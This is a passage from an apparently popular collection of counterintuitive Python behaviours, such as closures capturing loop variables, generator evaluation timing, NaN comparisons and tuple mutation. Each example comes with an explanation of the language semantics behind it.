ZeroDivisionError: division by zero >>> one_more_func() Iteration 0 ``` #### 💡 Explanation: - When a `return`, `break` or `continue` statement is executed in the `try` suite of a "try…finally" statement, the `finally` clause is also executed on the way out. - The return value of a function is determined by the last `return` statement executed. Since the `finally` clause always executes, a `return` statement executed in the `finally` clause will always be the last one executed. - The caveat here is, if the finally clause executes a `return` or `break` statement, the temporarily saved exception is discarded. --- ### ▶ For what? <!-- Example ID: 64a9dccf-5083-4bc9-98aa-8aeecde4f210 ---> ```py some_string = "wtf" some_dict = {} for i, some_dict[i] in enumerate(some_string): i = 10 ``` **Output:** ```py >>> some_dict # An indexed dict appears. {0: 'w', 1: 't', 2: 'f'} ``` #### 💡 Explanation: * A `for` statement is defined in the [Python grammar](https://docs.python.org/3/reference/grammar.html) as: ``` for_stmt: 'for' exprlist 'in' testlist ':' suite ['else' ':' suite] ``` Where `exprlist` is the assignment target. This means that the equivalent of `{exprlist} = {next_value}` is **executed for each item** in the iterable. An interesting example that illustrates this: ```py for i in range(4): print(i) i = 10 ``` **Output:** ``` 0 1 2 3 ``` Did you expect the loop to run just once? **💡 Explanation:** - The assignment statement `i = 10` never affects the iterations of the loop because of the way for loops work in Python. Before the beginning of every iteration, the next item provided by the iterator (`range(4)` in this case) is unpacked and assigned the target list variables (`i` in this case). * The `enumerate(some_string)` function yields a new value `i` (a counter going up) and a character from the `some_string` in each iteration. It then sets the (just assigned) `i` key of the dictionary `some_dict` to that character. The unrolling of the loop can be simplified as: ```py >>> i, some_dict[i] = (0, 'w') >>> i, some_dict[i] = (1, 't') >>> i, some_dict[i] = (2, 'f') >>> some_dict ``` --- ### ▶ Evaluation time discrepancy <!-- Example ID: 6aa11a4b-4cf1-467a-b43a-810731517e98 ---> 1\. ```py array = [1, 8, 15] # A typical generator expression gen = (x for x in array if array.count(x) > 0) array = [2, 8, 22] ``` **Output:** ```py >>> print(list(gen)) # Where did the other values go? [8] ``` 2\. ```py array_1 = [1,2,3,4] gen_1 = (x for x in array_1) array_1 = [1,2,3,4,5] array_2 = [1,2,3,4] gen_2 = (x for x in array_2) array_2[:] = [1,2,3,4,5] ``` **Output:** ```py >>> print(list(gen_1)) [1, 2, 3, 4] >>> print(list(gen_2)) [1, 2, 3, 4, 5] ``` 3\. ```py array_3 = [1, 2, 3] array_4 = [10, 20, 30] gen = (i + j for i in array_3 for j in array_4) array_3 = [4, 5, 6] array_4 = [400, 500, 600] ``` **Output:** ```py >>> print(list(gen)) [401, 501, 601, 402, 502, 602, 403, 503, 603] ``` #### 💡 Explanation - In a [generator](https://wiki.python.org/moin/Generators) expression, the `in` clause is evaluated at declaration time, but the conditional clause is evaluated at runtime. - So before runtime, `array` is re-assigned to the list `[2, 8, 22]`, and since out of `1`, `8` and `15`, only the count of `8` is greater than `0`, the generator only yields `8`. - The differences in the output of `g1` and `g2` in the second part is due the way variables `array_1` and `array_2` are re-assigned values. - In the first case, `array_1` is bound to the new object `[1,2,3,4,5]` and since the `in` clause is evaluated at the declaration time it still refers to the old object `[1,2,3,4]` (which is not destroyed). - In the second case, the slice assignment to `array_2` updates the same old object `[1,2,3,4]` to `[1,2,3,4,5]`. Hence both the `g2` and `array_2` still have reference to the same object (which has now been updated to `[1,2,3,4,5]`). - Okay, going by the logic discussed so far, shouldn't be the value of `list(gen)` in the third snippet be `[11, 21, 31, 12, 22, 32, 13, 23, 33]`? (because `array_3` and `array_4` are going to behave just like `array_1`). The reason why (only) `array_4` values got updated is explained in [PEP-289](https://www.python.org/dev/peps/pep-0289/#the-details) > Only the outermost for-expression is evaluated immediately, the other expressions are deferred until the generator is run. --- ### ▶ `is not ...` is not `is (not ...)` <!-- Example ID: b26fb1ed-0c7d-4b9c-8c6d-94a58a055c0d ---> ```py >>> 'something' is not None True >>> 'something' is (not None) False ``` #### 💡 Explanation - `is not` is a single binary operator, and has behavior different than using `is` and `not` separated. - `is not` evaluates to `False` if the variables on either side of the operator point to the same object and `True` otherwise. - In the example, `(not None)` evaluates to `True` since the value `None` is `False` in a boolean context, so the expression becomes `'something' is True`. --- ### ▶ A tic-tac-toe where X wins in the first attempt! <!-- Example ID: 69329249-bdcb-424f-bd09-cca2e6705a7a ---> ```py # Let's initialize a row row = [""] * 3 #row i['', '', ''] # Let's make a board board = [row] * 3 ``` **Output:** ```py >>> board [['', '', ''], ['', '', ''], ['', '', '']] >>> board[0] ['', '', ''] >>> board[0][0] '' >>> board[0][0] = "X" >>> board [['X', '', ''], ['X', '', ''], ['X', '', '']] ``` We didn't assign three `"X"`s, did we? #### 💡 Explanation: When we initialize `row` variable, this visualization explains what happens in the memory ![image](/images/tic-tac-toe/after_row_initialized.png) And when the `board` is initialized by multiplying the `row`, this is what happens inside the memory (each of the elements `board[0]`, `board[1]` and `board[2]` is a reference to the same list referred by `row`) ![image](/images/tic-tac-toe/after_board_initialized.png) We can avoid this scenario here by not using `row` variable to generate `board`. (Asked in [this](https://github.com/satwikkansal/wtfpython/issues/68) issue). ```py >>> board = [['']*3 for _ in range(3)] >>> board[0][0] = "X" >>> board [['X', '', ''], ['', '', ''], ['', '', '']] ``` --- ### ▶ Schrödinger's variable * <!-- Example ID: 4dc42f77-94cb-4eb5-a120-8203d3ed7604 ---> ```py funcs = [] results = [] for x in range(7): def some_func(): return x funcs.append(some_func) results.append(some_func()) # note the function call here funcs_results = [func() for func in funcs] ``` **Output (Python version):** ```py >>> results [0, 1, 2, 3, 4, 5, 6] >>> funcs_results [6, 6, 6, 6, 6, 6, 6] ``` The values of `x` were different in every iteration prior to appending `some_func` to `funcs`, but all the functions return 6 when they're evaluated after the loop completes. 2. ```py >>> powers_of_x = [lambda x: x**i for i in range(10)] >>> [f(2) for f in powers_of_x] [512, 512, 512, 512, 512, 512, 512, 512, 512, 512] ``` #### 💡 Explanation: * When defining a function inside a loop that uses the loop variable in its body, the loop function's closure is bound to the *variable*, not its *value*. The function looks up `x` in the surrounding context, rather than using the value of `x` at the time the function is created. So all of the functions use the latest value assigned to the variable for computation. We can see that it's using the `x` from the surrounding context (i.e. *not* a local variable) with: ```py >>> import inspect >>> inspect.getclosurevars(funcs[0]) ClosureVars(nonlocals={}, globals={'x': 6}, builtins={}, unbound=set()) ``` Since `x` is a global value, we can change the value that the `funcs` will lookup and return by updating `x`: ```py >>> x = 42 >>> [func() for func in funcs] [42, 42, 42, 42, 42, 42, 42] ``` * To get the desired behavior you can pass in the loop variable as a named variable to the function. **Why does this work?** Because this will define the variable *inside* the function's scope. It will no longer go to the surrounding (global) scope to look up the variables value but will create a local variable that stores the value of `x` at that point in time. ```py funcs = [] for x in range(7): def some_func(x=x): return x funcs.append(some_func) ``` **Output:** ```py >>> funcs_results = [func() for func in funcs] >>> funcs_results [0, 1, 2, 3, 4, 5, 6] ``` It is not longer using the `x` in the global scope: ```py >>> inspect.getclosurevars(funcs[0]) ClosureVars(nonlocals={}, globals={}, builtins={}, unbound=set()) ``` --- ### ▶ The chicken-egg problem * <!-- Example ID: 60730dc2-0d79-4416-8568-2a63323b3ce8 ---> 1\. ```py >>> isinstance(3, int) True >>> isinstance(type, object) True >>> isinstance(object, type) True ``` So which is the "ultimate" base class? There's more to the confusion by the way, 2\. ```py >>> class A: pass >>> isinstance(A, A) False >>> isinstance(type, type) True >>> isinstance(object, object) True ``` 3\. ```py >>> issubclass(int, object) True >>> issubclass(type, object) True >>> issubclass(object, type) False ``` #### 💡 Explanation - `type` is a [metaclass](https://realpython.com/python-metaclasses/) in Python. - **Everything** is an `object` in Python, which includes classes as well as their objects (instances). - class `type` is the metaclass of class `object`, and every class (including `type`) has inherited directly or indirectly from `object`. - There is no real base class among `object` and `type`. The confusion in the above snippets is arising because we're thinking about these relationships (`issubclass` and `isinstance`) in terms of Python classes. The relationship between `object` and `type` can't be reproduced in pure python. To be more precise the following relationships can't be reproduced in pure Python, + class A is an instance of class B, and class B is an instance of class A. + class A is an instance of itself. - These relationships between `object` and `type` (both being instances of each other as well as themselves) exist in Python because of "cheating" at the implementation level. --- ### ▶ Subclass relationships <!-- Example ID: 9f6d8cf0-e1b5-42d0-84a0-4cfab25a0bc0 ---> **Output:** ```py >>> from collections.abc import Hashable >>> issubclass(list, object) True >>> issubclass(object, Hashable) True >>> issubclass(list, Hashable) False ``` The Subclass relationships were expected to be transitive, right? (i.e., if `A` is a subclass of `B`, and `B` is a subclass of `C`, the `A` _should_ a subclass of `C`) #### 💡 Explanation: * Subclass relationships are not necessarily transitive in Python. Anyone is allowed to define their own, arbitrary `__subclasscheck__` in a metaclass. * When `issubclass(cls, Hashable)` is called, it simply looks for non-Falsey "`__hash__`" method in `cls` or anything it inherits from. * Since `object` is hashable, but `list` is non-hashable, it breaks the transitivity relation. * More detailed explanation can be found [here](https://www.naftaliharris.com/blog/python-subclass-intransitivity/). --- ### ▶ Methods equality and identity <!-- Example ID: 94802911-48fe-4242-defa-728ae893fa32 ---> 1. ```py class SomeClass: def method(self): pass @classmethod def classm(cls): pass @staticmethod def staticm(): pass ``` **Output:** ```py >>> print(SomeClass.method is SomeClass.method) True >>> print(SomeClass.classm is SomeClass.classm) False >>> print(SomeClass.classm == SomeClass.classm) True >>> print(SomeClass.staticm is SomeClass.staticm) True ``` Accessing `classm` twice, we get an equal object, but not the *same* one? Let's see what happens with instances of `SomeClass`: 2. ```py o1 = SomeClass() o2 = SomeClass() ``` **Output:** ```py >>> print(o1.method == o2.method) False >>> print(o1.method == o1.method) True >>> print(o1.method is o1.method) False >>> print(o1.classm is o1.classm) False >>> print(o1.classm == o1.classm == o2.classm == SomeClass.classm) True >>> print(o1.staticm is o1.staticm is o2.staticm is SomeClass.staticm) True ``` Accessing `classm` or `method` twice, creates equal but not *same* objects for the same instance of `SomeClass`. #### 💡 Explanation * Functions are [descriptors](https://docs.python.org/3/howto/descriptor.html). Whenever a function is accessed as an attribute, the descriptor is invoked, creating a method object which "binds" the function with the object owning the attribute. If called, the method calls the function, implicitly passing the bound object as the first argument (this is how we get `self` as the first argument, despite not passing it explicitly). ```py >>> o1.method <bound method SomeClass.method of <__main__.SomeClass object at ...>> ``` * Accessing the attribute multiple times creates a method object every time! Therefore `o1.method is o1.method` is never truthy. Accessing functions as class attributes (as opposed to instance) does not create methods, however; so `SomeClass.method is SomeClass.method` is truthy. ```py >>> SomeClass.method <function SomeClass.method at ...> ``` * `classmethod` transforms functions into class methods. Class methods are descriptors that, when accessed, create a method object which binds the *class* (type) of the object, instead of the object itself. ```py >>> o1.classm <bound method SomeClass.classm of <class '__main__.SomeClass'>> ``` * Unlike functions, `classmethod`s will create a method also when accessed as class attributes (in which case they bind the class, not to the type of it). So `SomeClass.classm is SomeClass.classm` is falsy. ```py >>> SomeClass.classm <bound method SomeClass.classm of <class '__main__.SomeClass'>> ``` * A method object compares equal when both the functions are equal, and the bound objects are the same. So `o1.method == o1.method` is truthy, although not the same object in memory. * `staticmethod` transforms functions into a "no-op" descriptor, which returns the function as-is. No method objects are ever created, so comparison with `is` is truthy. ```py >>> o1.staticm <function SomeClass.staticm at ...> >>> SomeClass.staticm <function SomeClass.staticm at ...> ``` * Having to create new "method" objects every time Python calls instance methods and having to modify the arguments every time in order to insert `self` affected performance badly. CPython 3.7 [solved it](https://bugs.python.org/issue26110) by introducing new opcodes that deal with calling methods without creating the temporary method objects. This is used only when the accessed function is actually called, so the snippets here are not affected, and still generate methods :) ### ▶ All-true-ation * <!-- Example ID: dfe6d845-e452-48fe-a2da-0ed3869a8042 --> ```py >>> all([True, True, True]) True >>> all([True, True, False]) False >>> all([]) True >>> all([[]]) False >>> all([[[]]]) True ``` Why's this True-False alteration? #### 💡 Explanation: - The implementation of `all` function is equivalent to - ```py def all(iterable): for element in iterable: if not element: return False return True ``` - `all([])` returns `True` since the iterable is empty. - `all([[]])` returns `False` because the passed array has one element, `[]`, and in python, an empty list is falsy. - `all([[[]]])` and higher recursive variants are always `True`. This is because the passed array's single element (`[[...]]`) is no longer empty, and lists with values are truthy. --- ### ▶ The surprising comma <!-- Example ID: 31a819c8-ed73-4dcc-84eb-91bedbb51e58 ---> **Output (< 3.6):** ```py >>> def f(x, y,): ... print(x, y) ... >>> def g(x=4, y=5,): ... print(x, y) ... >>> def h(x, **kwargs,): File "<stdin>", line 1 def h(x, **kwargs,): ^ SyntaxError: invalid syntax >>> def h(*args,): File "<stdin>", line 1 def h(*args,): ^ SyntaxError: invalid syntax ``` #### 💡 Explanation: - Trailing comma is not always legal in formal parameters list of a Python function. - In Python, the argument list is defined partially with leading commas and partially with trailing commas. This conflict causes situations where a comma is trapped in the middle, and no rule accepts it. - **Note:** The trailing comma problem is [fixed in Python 3.6](https://bugs.python.org/issue9232). The remarks in [this](https://bugs.python.org/issue9232#msg248399) post discuss in brief different usages of trailing commas in Python. --- ### ▶ Strings and the backslashes <!-- Example ID: 6ae622c3-6d99-4041-9b33-507bd1a4407b ---> **Output:** ```py >>> print("\"") " >>> print(r"\"") \" >>> print(r"\") File "<stdin>", line 1 print(r"\") ^ SyntaxError: EOL while scanning string literal >>> r'\'' == "\\'" True ``` #### 💡 Explanation - In a usual python string, the backslash is used to escape characters that may have a special meaning (like single-quote, double-quote, and the backslash itself). ```py >>> "wt\"f" 'wt"f' ``` - In a raw string literal (as indicated by the prefix `r`), the backslashes pass themselves as is along with the behavior of escaping the following character. ```py >>> r'wt\"f' == 'wt\\"f' True >>> print(repr(r'wt\"f') 'wt\\"f' >>> print("\n") >>> print(r"\\n") '\\n' ``` - This means when a parser encounters a backslash in a raw string, it expects another character following it. And in our case (`print(r"\")`), the backslash escaped the trailing quote, leaving the parser without a terminating quote (hence the `SyntaxError`). That's why backslashes don't work at the end of a raw string. --- ### ▶ not knot! <!-- Example ID: 7034deb1-7443-417d-94ee-29a800524de8 ---> ```py x = True y = False ``` **Output:** ```py >>> not x == y True >>> x == not y File "<input>", line 1 x == not y ^ SyntaxError: invalid syntax ``` #### 💡 Explanation: * Operator precedence affects how an expression is evaluated, and `==` operator has higher precedence than `not` operator in Python. * So `not x == y` is equivalent to `not (x == y)` which is equivalent to `not (True == False)` finally evaluating to `True`. * But `x == not y` raises a `SyntaxError` because it can be thought of being equivalent to `(x == not) y` and not `x == (not y)` which you might have expected at first sight. * The parser expected the `not` token to be a part of the `not in` operator (because both `==` and `not in` operators have the same precedence), but after not being able to find an `in` token following the `not` token, it raises a `SyntaxError`. --- ### ▶ Half triple-quoted strings <!-- Example ID: c55da3e2-1034-43b9-abeb-a7a970a2ad9e ---> **Output:** ```py >>> print('wtfpython''') wtfpython >>> print("wtfpython""") wtfpython >>> # The following statements raise `SyntaxError` >>> # print('''wtfpython') >>> # print("""wtfpython") File "<input>", line 3 print("""wtfpython") ^ SyntaxError: EOF while scanning triple-quoted string literal ``` #### 💡 Explanation: + Python supports implicit [string literal concatenation](https://docs.python.org/3/reference/lexical_analysis.html#string-literal-concatenation), Example, ``` >>> print("wtf" "python") wtfpython >>> print("wtf" "") # or "wtf""" wtf ``` + `'''` and `"""` are also string delimiters in Python which causes a SyntaxError because the Python interpreter was expecting a terminating triple quote as delimiter while scanning the currently encountered triple quoted string literal. --- ### ▶ What's wrong with booleans? <!-- Example ID: 0bba5fa7-9e6d-4cd2-8b94-952d061af5dd ---> 1\. ```py # A simple example to count the number of booleans and # integers in an iterable of mixed data types. mixed_list = [False, 1.0, "some_string", 3, True, [], False] integers_found_so_far = 0 booleans_found_so_far = 0 for item in mixed_list: if isinstance(item, int): integers_found_so_far += 1 elif isinstance(item, bool): booleans_found_so_far += 1 ``` **Output:** ```py >>> integers_found_so_far 4 >>> booleans_found_so_far 0 ``` 2\. ```py >>> some_bool = True >>> "wtf" * some_bool 'wtf' >>> some_bool = False >>> "wtf" * some_bool '' ``` 3\. ```py def tell_truth(): True = False if True == False: print("I have lost faith in truth!") ``` **Output (< 3.x):** ```py >>> tell_truth() I have lost faith in truth! ``` #### 💡 Explanation: * `bool` is a subclass of `int` in Python ```py >>> issubclass(bool, int) True >>> issubclass(int, bool) False ``` * And thus, `True` and `False` are instances of `int` ```py >>> isinstance(True, int) True >>> isinstance(False, int) True ``` * The integer value of `True` is `1` and that of `False` is `0`. ```py >>> int(True) 1 >>> int(False) 0 ``` * See this StackOverflow [answer](https://stackoverflow.com/a/8169049/4354153) for the rationale behind it. * Initially, Python used to have no `bool` type (people used 0 for false and non-zero value like 1 for true). `True`, `False`, and a `bool` type was added in 2.x versions, but, for backward compatibility, `True` and `False` couldn't be made constants. They just were built-in variables, and it was possible to reassign them * Python 3 was backward-incompatible, the issue was finally fixed, and thus the last snippet won't work with Python 3.x! --- ### ▶ Class attributes and instance attributes <!-- Example ID: 6f332208-33bd-482d-8106-42863b739ed9 ---> 1\. ```py class A: x = 1 class B(A): pass class C(A): pass ``` **Output:** ```py >>> A.x, B.x, C.x (1, 1, 1) >>> B.x = 2 >>> A.x, B.x, C.x (1, 2, 1) >>> A.x = 3 >>> A.x, B.x, C.x # C.x changed, but B.x didn't (3, 2, 3) >>> a = A() >>> a.x, A.x (3, 3) >>> a.x += 1 >>> a.x, A.x (4, 3) ``` 2\. ```py class SomeClass: some_var = 15 some_list = [5] another_list = [5] def __init__(self, x): self.some_var = x + 1 self.some_list = self.some_list + [x] self.another_list += [x] ``` **Output:** ```py >>> some_obj = SomeClass(420) >>> some_obj.some_list [5, 420] >>> some_obj.another_list [5, 420] >>> another_obj = SomeClass(111) >>> another_obj.some_list [5, 111] >>> another_obj.another_list [5, 420, 111] >>> another_obj.another_list is SomeClass.another_list True >>> another_obj.another_list is some_obj.another_list True ``` #### 💡 Explanation: * Class variables and variables in class instances are internally handled as dictionaries of a class object. If a variable name is not found in the dictionary of the current class, the parent classes are searched for it. * The `+=` operator modifies the mutable object in-place without creating a new object. So changing the attribute of one instance affects the other instances and the class attribute as well. --- ### ▶ yielding None <!-- Example ID: 5a40c241-2c30-40d0-8ba9-cf7e097b3b53 ---> ```py some_iterable = ('a', 'b') def some_func(val): return "something" ``` **Output (<= 3.7.x):** ```py >>> [x for x in some_iterable] ['a', 'b'] >>> [(yield x) for x in some_iterable] <generator object <listcomp> at 0x7f70b0a4ad58> >>> list([(yield x) for x in some_iterable]) ['a', 'b'] >>> list((yield x) for x in some_iterable) ['a', None, 'b', None] >>> list(some_func((yield x)) for x in some_iterable) ['a', 'something', 'b', 'something'] ``` #### 💡 Explanation: - This is a bug in CPython's handling of `yield` in generators and comprehensions. - Source and explanation can be found here: https://stackoverflow.com/questions/32139885/yield-in-list-comprehensions-and-generator-expressions - Related bug report: https://bugs.python.org/issue10544 - Python 3.8+ no longer allows `yield` inside list comprehension and will throw a `SyntaxError`. --- ### ▶ Yielding from... return! * <!-- Example ID: 5626d8ef-8802-49c2-adbc-7cda5c550816 ---> 1\. ```py def some_func(x): if x == 3: return ["wtf"] else: yield from range(x) ``` **Output (> 3.3):** ```py >>> list(some_func(3)) [] ``` Where did the `"wtf"` go? Is it due to some special effect of `yield from`? Let's validate that, 2\. ```py def some_func(x): if x == 3: return ["wtf"] else: for i in range(x): yield i ``` **Output:** ```py >>> list(some_func(3)) [] ``` The same result, this didn't work either. #### 💡 Explanation: + From Python 3.3 onwards, it became possible to use `return` statement with values inside generators (See [PEP380](https://www.python.org/dev/peps/pep-0380/)). The [official docs](https://www.python.org/dev/peps/pep-0380/#enhancements-to-stopiteration) say that, > "... `return expr` in a generator causes `StopIteration(expr)` to be raised upon exit from the generator." + In the case of `some_func(3)`, `StopIteration` is raised at the beginning because of `return` statement. The `StopIteration` exception is automatically caught inside the `list(...)` wrapper and the `for` loop. Therefore, the above two snippets result in an empty list. + To get `["wtf"]` from the generator `some_func` we need to catch the `StopIteration` exception, ```py try: next(some_func(3)) except StopIteration as e: some_string = e.value ``` ```py >>> some_string ["wtf"] ``` --- ### ▶ Nan-reflexivity * <!-- Example ID: 59bee91a-36e0-47a4-8c7d-aa89bf1d3976 ---> 1\. ```py a = float('inf') b = float('nan') c = float('-iNf') # These strings are case-insensitive d = float('nan') ``` **Output:** ```py >>> a inf >>> b nan >>> c -inf >>> float('some_other_string') ValueError: could not convert string to float: some_other_string >>> a == -c # inf==inf True >>> None == None # None == None True >>> b == d # but nan!=nan False >>> 50 / a 0.0 >>> a / a nan >>> 23 + b nan ``` 2\. ```py >>> x = float('nan') >>> y = x / x >>> y is y # identity holds True >>> y == y # equality fails of y False >>> [y] == [y] # but the equality succeeds for the list containing y True ``` #### 💡 Explanation: - `'inf'` and `'nan'` are special strings (case-insensitive), which, when explicitly typecast-ed to `float` type, are used to represent mathematical "infinity" and "not a number" respectively. - Since according to IEEE standards ` NaN != NaN`, obeying this rule breaks the reflexivity assumption of a collection element in Python i.e. if `x` is a part of a collection like `list`, the implementations like comparison are based on the assumption that `x == x`. Because of this assumption, the identity is compared first (since it's faster) while comparing two elements, and the values are compared only when the identities mismatch. The following snippet will make things clearer, ```py >>> x = float('nan') >>> x == x, [x] == [x] (False, True) >>> y = float('nan') >>> y == y, [y] == [y] (False, True) >>> x == y, [x] == [y] (False, False) ``` Since the identities of `x` and `y` are different, the values are considered, which are also different; hence the comparison returns `False` this time. - Interesting read: [Reflexivity, and other pillars of civilization](https://bertrandmeyer.com/2010/02/06/reflexivity-and-other-pillars-of-civilization/) --- ### ▶ Mutating the immutable! <!-- Example ID: 15a9e782-1695-43ea-817a-a9208f6bb33d ---> This might seem trivial if you know how references work in Python. ```py some_tuple = ("A", "tuple", "with", "values") another_tuple = ([1, 2], [3, 4], [5, 6]) ``` **Output:** ```py >>> some_tuple[2] = "change this" TypeError: 'tuple' object does not support item assignment >>> another_tuple[2].append(1000) #This throws no error >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000]) >>> another_tuple[2] += [99, 999] TypeError: 'tuple' object does not support item assignment >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000, 99, 999]) ``` But I thought tuples were immutable... #### 💡 Explanation: * Quoting from https://docs.python.org/3/reference/datamodel.html > Immutable sequences An object of an immutable sequence type cannot change once it is created. (If the object contains references to other objects, these other objects may be mutable and may be modified; however, the collection of objects directly referenced by an immutable object cannot change.) * `+=` operator changes the list in-place. The item assignment doesn't work, but when the exception occurs, the item has already been changed in place. * There's also an explanation in [official Python FAQ](https://docs.python.org/3/faq/programming.html#why-does-a-tuple-i-item-raise-an-exception-when-the-addition-works). --- ### ▶ The disappearing variable from outer scope <!-- Example ID: 7f1e71b6-cb3e-44fb-aa47-87ef1b7decc8 ---> ```py e = 7 try: raise Exception() except Exception as e: pass ``` **Output (Python 2.x):** ```py >>> print(e) # prints nothing ``` **Output (Python 3.x):** ```py >>> print(e) NameError: name 'e' is not defined ``` #### 💡 Explanation: * Source: https://docs.python.org/3/reference/compound_stmts.html#except When an exception has been assigned using `as` target, it is cleared at the end of the `except` clause. This is as if ```py except E as N: foo ``` was translated into ```py except E as N: try: foo finally: del N ``` This means the exception must be assigned to a different name to be able to refer to it after the except clause. Exceptions are cleared because, with the traceback attached to them, they form a reference cycle with the stack frame, keeping all locals in that frame alive until the next garbage collection occurs. * The clauses are not scoped in Python. Everything in the example is present in the same scope, and the variable `e` got removed due to the execution of the `except` clause. The same is not the case with functions that have their separate inner-scopes. The example below illustrates this: ```py def f(x): del(x) print(x) x = 5 y = [5, 4, 3] ``` **Output:** ```py >>> f(x) UnboundLocalError: local variable 'x' referenced before assignment >>> f(y) UnboundLocalError: local variable 'x' referenced before assignment >>> x 5 >>> y [5, 4, 3] ``` * In Python 2.x, the variable name `e` gets assigned to `Exception()` instance, so when you try to print, it prints nothing. **Output (Python 2.x):** ```py >>> e Exception() >>> print e # Nothing is printed! ``` --- ### ▶ The mysterious key type conversion <!-- Example ID: 00f42dd0-b9ef-408d-9e39-1bc209ce3f36 ---> ```py class SomeClass(str): pass some_dict = {'s': 42} ``` **Output:** ```py >>> type(list(some_dict.keys())[0]) str >>> s = SomeClass('s') >>> some_dict[s] = 40 >>> some_dict # expected: Two different keys-value pairs {'s': 40} >>> type(list(some_dict.keys())[0]) str ``` #### 💡 Explanation: * Both the object `s` and the string `"s"` hash to the same value because `SomeClass` inherits the `__hash__` method of `str` class. * `SomeClass("s") == "s"` evaluates to `True` because `SomeClass` also inherits `__eq__` method from `str` class. * Since both the objects hash to the same value and are equal, they are represented by the same key in the dictionary. * For the desired behavior, we can redefine the `__eq__` method in `SomeClass` ```py class SomeClass(str): def __eq__(self, other): return ( type(self) is SomeClass and type(other) is SomeClass and super().__eq__(other) ) # When we define a custom __eq__, Python stops automatically inheriting the # __hash__ method, so we need to define it as well __hash__ = str.__hash__ some_dict = {'s':42} ``` **Output:** ```py >>> s = SomeClass('s') >>> some_dict[s] = 40 >>> some_dict {'s': 40, 's': 42} >>> keys = list(some_dict.keys()) >>> type(keys[0]), type(keys[1]) (__main__.SomeClass, str) ``` --- ### ▶ Let's see if you can guess this? <!-- Example ID: 81aa9fbe-bd63-4283-b56d-6fdd14c9105e ---> ```py a, b = a[b] = {}, 5 ``` **Output:** ```py >>> a {5: ({...}, 5)} ``` #### 💡 Explanation: * According to [Python language reference](https://docs.python.org/3/reference/simple_stmts.html#assignment-statements), assignment statements have the form ``` (target_list "=")+ (expression_list | yield_expression) ``` and > An assignment statement evaluates the expression list (remember that this can be a single expression or a comma-separated list, the latter yielding a tuple) and assigns the single resulting object to each of the target lists, from left to right. * The `+` in `(target_list "=")+` means there can be **one or more** target lists. In this case, target lists are `a, b` and `a[b]` (note the expression list is exactly one, which in our case is `{}, 5`). * After the expression list is evaluated, its value is unpacked to the target lists from **left to right**. So, in our case, first the `{}, 5` tuple is unpacked to `a, b` and we now have `a = {}` and `b = 5`. * `a` is now assigned to `{}`, which is a mutable object. * The second target list is `a[b]` (you may expect this to throw an error because both `a` and `b` have not been defined in the statements before. But remember, we just assigned `a` to `{}` and `b` to `5`). * Now, we are setting the key `5` in the dictionary to the tuple `({}, 5)` creating a circular reference (the `{...}` in the output refers to the same object that `a` is already referencing). Another simpler example of circular reference could be ```py >>> some_list = some_list[0] = [0] >>> some_list [[...]] >>> some_list[0] [[...]] >>> some_list is some_list[0] True >>> some_list[0][0][0][0][0][0] == some_list True ``` Similar is the case in our example (`a[b][0]` is the same object as `a`) * So to sum it up, you can break the example down to ```py a, b = {}, 5 a[b] = a, b ``` And the circular reference can be justified by the fact that `a[b][0]` is the same object as `a` ```py >>> a[b][0] is a True ``` --- ### ▶ Exceeds the limit for integer string conversion ```py >>> # Python 3.10.6 >>> int("2" * 5432) >>> # Python 3.10.8 >>> int("2" * 5432) ``` **Output:** ```py >>> # Python 3.10.6 222222222222222222222222222222222222222222222222222222222222222... >>> # Python 3.10.8 Traceback (most recent call last): ... ValueError: Exceeds the limit (4300) for integer string conversion: value has 5432 digits; use sys.set_int_max_str_digits() to increase the limit. ``` #### 💡 Explanation: This call to `int()` works fine in Python 3.10.6 and raises a ValueError in Python 3.10.8. Note that Python can still work with large integers. The error is only raised when converting between integers and strings. Fortunately, you can increase the limit for the allowed number of digits when you expect an operation to exceed it. To do this, you can use one of the following: - The -X int_max_str_digits command-line flag - The set_int_max_str_digits() function from the sys module - The PYTHONINTMAXSTRDIGITS environment variable [Check the documentation](https://docs.python.org/3/library/stdtypes.html#int-max-str-digits) for more details on changing the default limit if you expect your code to exceed this value. --- ## Section: Slippery Slopes ### ▶ Modifying a dictionary while iterating over it <!-- Example ID: b4e5cdfb-c3a8-4112-bd38-e2356d801c41 ---> ```py x = {0: None} for i in x: del x[i] x[i+1] = None print(i) ``` **Output (Python 2.7- Python 3.5):** ``` 0 1 2 3 4 5 6 7 ``` Yes, it runs for exactly **eight** times and stops. #### 💡 Explanation: * Iteration over a dictionary that you edit at the same time is not supported. * It runs eight times because that's the point at which the dictionary resizes to hold more keys (we have eight deletion entries, so a resize is needed). This is actually an implementation detail. * How deleted keys are handled and when the resize occurs might be different for different Python implementations. * So for Python versions other than Python 2.7 - Python 3.5, the count might be different from 8 (but whatever the count is, it's going to be the same every time you run it). You can find some discussion around this [here](https://github.com/satwikkansal/wtfpython/issues/53) or in [this](https://stackoverflow.com/questions/44763802/bug-in-python-dict) StackOverflow thread. * Python 3.7.6 onwards, you'll see `RuntimeError: dictionary keys changed during iteration` exception if you try to do this. --- ### ▶ Stubborn `del` operation <!-- Example ID: 777ed4fd-3a2d-466f-95e7-c4058e61d78e ---> <!-- read-only --> ```py class SomeClass: def __del__(self): print("Deleted!") ``` **Output:** 1\. ```py >>> x = SomeClass() >>> y = x >>> del x # this should print "Deleted!" >>> del y Deleted! ``` Phew, deleted at last. You might have guessed what saved `__del__` from being called in our first attempt to delete `x`. Let's add more twists to the example. 2\. ```py >>> x = SomeClass() >>> y = x >>> del x >>> y # check if y exists <__main__.SomeClass instance at 0x7f98a1a67fc8> >>> del y # Like previously, this should print "Deleted!" >>> globals() # oh, it didn't. Let's check all our global variables and confirm Deleted! {'__builtins__': <module '__builtin__' (built-in)>, 'SomeClass': <class __main__.SomeClass at 0x7f98a1a5f668>, '__package__': None, '__name__': '__main__', '__doc__': None} ``` Okay, now it's deleted :confused: #### 💡 Explanation: + `del x` doesn’t directly call `x.__del__()`. + When `del x` is encountered, Python deletes the name `x` from current scope and decrements by 1 the reference count of the object `x` referenced. `__del__()` is called only when the object's reference count reaches zero. + In the second output snippet, `__del__()` was not called because the previous statement (`>>> y`) in the interactive interpreter created another reference to the same object (specifically, the `_` magic variable which references the result value of the last non `None` expression on the REPL), thus preventing the reference count from reaching zero when `del y` was encountered. + Calling `globals` (or really, executing anything that will have a non `None` result) caused `_` to reference the new result, dropping the existing reference. Now the reference count reached 0 and we can see "Deleted!" being printed (finally!). --- ### ▶ The out of scope variable <!-- Example ID: 75c03015-7be9-4289-9e22-4f5fdda056f7 ---> 1\. ```py a = 1 def some_func(): return a def another_func(): a 